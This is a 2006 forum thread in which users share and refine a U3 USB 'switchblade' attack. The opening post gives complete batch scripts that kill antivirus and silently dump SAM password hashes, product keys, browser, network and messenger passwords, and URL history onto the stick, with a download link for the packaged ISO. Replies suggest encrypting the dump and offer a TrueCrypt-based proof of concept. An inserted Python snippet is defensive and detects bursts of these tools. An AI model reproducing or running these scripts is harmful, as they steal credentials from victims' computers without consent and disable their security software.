djcool Posted December 10, 2006

Ok, let's start. I have the switchblade folder running on the U3 partition. When I insert the USB flash it will copy the password etc. to the other flash partition. I created a simple comparison batch file; it searches for, for example, DJCOOL.bmp in the root folder, and if it's found it copies the content to that drive. I renamed the SWITCHBLADE folder to U3.

START.BAT

@echo off
if exist C:DJCOOL.bmp set CARD=C:
if exist D:DJCOOL.bmp set CARD=D:
if exist E:DJCOOL.bmp set CARD=E:
if exist F:DJCOOL.bmp set CARD=F:
if exist G:DJCOOL.bmp set CARD=G:
if exist H:DJCOOL.bmp set CARD=H:
if exist I:DJCOOL.bmp set CARD=I:
if exist J:DJCOOL.bmp set CARD=J:
if exist K:DJCOOL.bmp set CARD=K:
if exist L:DJCOOL.bmp set CARD=L:
if exist M:DJCOOL.bmp set CARD=M:
if exist N:DJCOOL.bmp set CARD=N:
if exist O:DJCOOL.bmp set CARD=O:
if exist P:DJCOOL.bmp set CARD=P:
if exist R:DJCOOL.bmp set CARD=R:
if exist S:DJCOOL.bmp set CARD=S:
if exist T:DJCOOL.bmp set CARD=T:
if exist U:DJCOOL.bmp set CARD=U:
if exist V:DJCOOL.bmp set CARD=V:
if exist W:DJCOOL.bmp set CARD=W:
if exist X:DJCOOL.bmp set CARD=X:
if exist Y:DJCOOL.bmp set CARD=Y:
if exist Z:DJCOOL.bmp set CARD=Z:
nircmd.exe execmd CALL .avkill.exe
nircmd.exe execmd CALL .go.bat
nircmd.exe execmd CALL .progstart.bat

GO.BAT

@echo off
if not exist %CARD%U3dump md %CARD%U3dump >nul
if not exist %CARD%U3dump%computername% md %CARD%U3dump%computername% >nul
cd U3tools >nul
Echo ************************************ > %CARD%U3dump%computername%%computername%.log 2>&1
echo ***********[System info]************ >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %CARD%U3dump%computername%%computername%.log 2>&1
ipconfig /all >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
echo ***********[Dump SAM]*************** >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
.pwdump.exe %computername% >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
echo ***********[Dump Product Keys]****** >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
.produkey /nosavereg /stext "%CARD%U3dump%computername%%computername%_pk.log" /remote %computername% >> %CARD%U3dump%computername%%computername%.log 2>&1
copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_pk.log* %CARD%U3dump%computername%%computername%.log >> nul
del /f /q "%CARD%U3dump%computername%%computername%_pk.log" >nul
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
echo ***********[Dump IE7 secrets]******* >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
.iepv.exe /stext "%CARD%U3dump%computername%%computername%_ie7.log" >> %CARD%U3dump%computername%%computername%.log 2>&1
copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_ie7.log* %CARD%U3dump%computername%%computername%.log >> nul
del /f /q "%CARD%U3dump%computername%%computername%_ie7.log" >nul
Echo ************************************ >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1
echo ***********[Dump updates-list]******* >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1
.wul.exe /stext "%CARD%U3dump%computername%%computername%_LSA.log" >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1
copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_lsa.log* %CARD%U3dump%computername%%computername%-updateslist.log >> nul
del /f /q "%CARD%U3dump%computername%%computername%_lsa.log" >nul
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
echo ***********[Dump Network PW]******** >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
.netpass.exe /stext "%CARD%U3dump%computername%%computername%_np.log" >> %CARD%U3dump%computername%%computername%.log 2>&1
copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_np.log* %CARD%U3dump%computername%%computername%.log >> nul
del /f /q "%CARD%U3dump%computername%%computername%_np.log" >nul
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
echo ***********[Dump messenger PW]******** >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
.mspass.exe /stext "%CARD%U3dump%computername%%computername%_ms.log" >> %CARD%U3dump%computername%%computername%.log 2>&1
copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_ms.log* %CARD%U3dump%computername%%computername%.log >> nul
del /f /q "%CARD%U3dump%computername%%computername%_ms.log" >nul
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
echo ***********[Dump URL History]******* >> %CARD%U3dump%computername%%computername%.log 2>&1
Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1
cscript //nologo .DUH.vbs >> %CARD%U3dump%computername%%computername%.log 2>&1
:End
exit

Here is my custom.iso. Don't forget to put a file called "DJCOOL.bmp" on the root of the flash disk!

http://rapidshare.com/files/6925599/U3CUSTOM.rar

PS: sorry for my English
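
Seen from the defender's side, the batch files in the first post start several named tools within seconds of each other, most of them with a /stext export into a U3dump folder. The following is an added example, not part of the thread: it correlates process starts per host, and the record layout, sample data, time window and threshold are all assumptions.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# Executable names as they appear in the START.BAT / GO.BAT quoted in the thread.
TOOLS = {"nircmd.exe", "avkill.exe", "pwdump.exe", "produkey.exe",
         "iepv.exe", "wul.exe", "netpass.exe", "mspass.exe"}
WINDOW = timedelta(seconds=120)  # assumed correlation window
MIN_TOOLS = 3                    # assumed threshold of distinct tools per host

SAMPLE = [  # constructed records: (host, start time, image path, command line)
    ("WS-01", "2006-12-10T14:03:01", r"E:\U3\nircmd.exe", "nircmd.exe execmd CALL go.bat"),
    ("WS-01", "2006-12-10T14:03:04", r"E:\U3\tools\pwdump.exe", "pwdump.exe WS-01"),
    ("WS-01", "2006-12-10T14:03:09", r"E:\U3\tools\produkey.exe",
     r'produkey /nosavereg /stext "F:\U3dump\WS-01\WS-01_pk.log"'),
    ("WS-01", "2006-12-10T14:03:15", r"E:\U3\tools\netpass.exe",
     r'netpass.exe /stext "F:\U3dump\WS-01\WS-01_np.log"'),
    ("WS-02", "2006-12-10T09:00:00", r"C:\Tools\nircmd.exe", "nircmd.exe monitor off"),
]

def indicators(image, cmdline):
    """Indicator labels for one process start: listed tool, /stext export, U3dump path."""
    name, cmd = ntpath.basename(image).lower(), cmdline.lower()
    found = set()
    if name in TOOLS:
        found.add("tool:" + name)
    if "/stext" in cmd:
        found.add("flag:/stext")
    if "u3dump" in cmd:
        found.add("path:u3dump")
    return found

def detect(records):
    """Return {host: tools} where >= MIN_TOOLS distinct listed tools start within WINDOW."""
    by_host = defaultdict(list)
    for host, ts, image, cmdline in records:
        tools = {i for i in indicators(image, cmdline) if i.startswith("tool:")}
        if tools:
            by_host[host].append((datetime.fromisoformat(ts), tools))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            seen = set().union(*(t for ts, t in hits[i:] if ts - start <= WINDOW))
            if len(seen) >= MIN_TOOLS:
                alerts[host] = sorted(seen)
                break
    return alerts
```

A single listed tool on its own (the WS-02 record) does not alert; only the burst of distinct tools on WS-01 does.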

djcool (Author) Posted December 11, 2006

Let's go a step further: at the end of the process the DUMP folder could be compressed with rar and password protected, and the original folder deleted. :D

kat Posted December 13, 2006

or let's do it like so ... put in a smaller version of the U3 ISO ... i.e. take out the languages and UPX the files to make them smaller ... then add TrueCrypt and a TC file that is mounted read-only ... and runs the program and then unmounts the drive ... I know the big drawback is TrueCrypt and the Admin but hey, it's something new.

Here is the POC: Download U3CUSTOM.ISO. Based on your DJCool, just put a generic "DJ" file in the main U3 and you're good to go ...